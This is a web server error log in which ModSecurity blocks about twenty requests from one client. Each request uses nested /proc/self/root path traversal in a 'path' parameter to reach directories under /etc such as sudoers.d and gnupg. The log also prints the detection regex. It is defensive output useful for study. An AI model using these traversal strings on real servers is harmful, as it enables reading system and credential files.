https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:25.410501 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.243.203:37144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6dbysWC90G-1nBrAy4wAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:26.667084 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:37150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6dtSswJuvopo3lOhNbwAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:27.823168 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:37162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6d9SswJuvopo3lOhNcAAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:29.236062 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:37178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6eY6lpbStxTqkSktcbQAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:30.581672 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:46800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6eo6lpbStxTqkSktcbwAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:31.888918 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:46802] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6e3bQATo66fKoS7w6YQAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:33.179789 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:46810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6fdSswJuvopo3lOhNcQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:34.545236 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:46818] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6frysWC90G-1nBrAy7QAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:35.872126 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:46828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6f7ABkC4fWIHEf8HYcwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:37.162774 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:46836] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6gXjZBu2q05ozVU9DdwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:38.487083 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.243.203:46850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6gglT9VtDQc7bgUyZuQAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:39.831797 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:46854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6g3bQATo66fKoS7w6YgAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:41.147330 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:36294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6hdSswJuvopo3lOhNcwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:42.506905 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.243.203:36296] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6hv9ocpUE4ed4uDzadAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:43.723748 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.243.203:36310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6hxXjF1vJNtV6CWrmYQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:45.045458 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:36324] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6idSswJuvopo3lOhNdAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:46.347051 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:36332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6injZBu2q05ozVU9DeQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:47.687123 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:36344] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6i_9ocpUE4ed4uDzadwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:49.005370 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:36354] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6jf9ocpUE4ed4uDzaeAAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:50.311443 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:55704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6jtSswJuvopo3lOhNdgAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:51.671065 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.243.203:55720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6jxXjF1vJNtV6CWrmZAAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:52.853499 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:55728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6kJqj1wV0Si-OkefXLAAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
